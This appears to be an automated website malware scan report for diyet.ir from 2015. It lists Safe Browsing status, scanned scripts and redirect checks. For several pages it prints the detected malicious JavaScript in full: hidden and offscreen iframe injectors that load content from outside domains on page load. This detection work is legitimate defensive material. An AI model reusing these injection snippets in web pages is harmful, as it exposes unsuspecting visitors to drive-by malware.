Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=diyet.ir
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://diyet.ir/ | 200 OK Content-Length: 175235 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://anadoluengellilerkenti.com/img/trans/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://googleleadservices.cn/statistics1.js | 200 OK Content-Length: 398 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://googlestats.cn/default.html'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('f0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dr11938\'></div>'); document.getElementById('__dr11938').appendChild(_q); Antivirus reports:
| ||
http://diyet.ir/engine/classes/js/jquery.js | 200 OK Content-Length: 93868 Content-Type: application/javascript | clean |
http://diyet.ir/engine/classes/js/jqueryui.js | 200 OK Content-Length: 65477 Content-Type: application/javascript | clean |
http://diyet.ir/engine/classes/js/dle_js.js | 200 OK Content-Length: 20837 Content-Type: application/javascript | clean |
http://diyet.ir/templates/Default/js/java.js | 200 OK Content-Length: 2715 Content-Type: application/javascript | clean |
http://diyet.ir/templates/Default/js/jquery.aviaSlider.min.js | 200 OK Content-Length: 5485 Content-Type: application/javascript | clean |
http://diyet.ir/templates/Default/js/jquery.prettyPhoto.js | 200 OK Content-Length: 21487 Content-Type: application/javascript | clean |
http://diyet.ir/templates/Default/js/custom.min.js | 200 OK Content-Length: 1585 Content-Type: application/javascript | clean |
http://diyet.ir/templates/Default/js/jquery.vticker-min.js | 200 OK Content-Length: 1771 Content-Type: application/javascript | clean |
http://diyet.ir/templates/Default/js/jquery.accessible-news-slider.js | 200 OK Content-Length: 8891 Content-Type: application/javascript | clean |
http://wikipedia-org.cn/click.js | 200 OK Content-Length: 12803 Content-Type: text/javascript | clean |
http://diyet.ir/buy.html | 200 OK Content-Length: 83712 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://anadoluengellilerkenti.com/img/trans/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://diyet.ir/sell.html | 200 OK Content-Length: 84650 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://anadoluengellilerkenti.com/img/trans/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://diyet.ir/orgcat/0/ | 200 OK Content-Length: 128873 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://anadoluengellilerkenti.com/img/trans/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: diyet.ir
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 07:48:11 GMT
Server: Apache
Content-Type: text/html
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: diyet.ir
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 07:48:11 GMT
Server: Apache
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: diyet.ir
Referer: http://www.google.com/search?q=diyet.ir
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: diyet.ir
Referer: http://www.google.com/search?q=diyet.ir
Result:
The result is similar to the first query. There are no suspicious redirects found.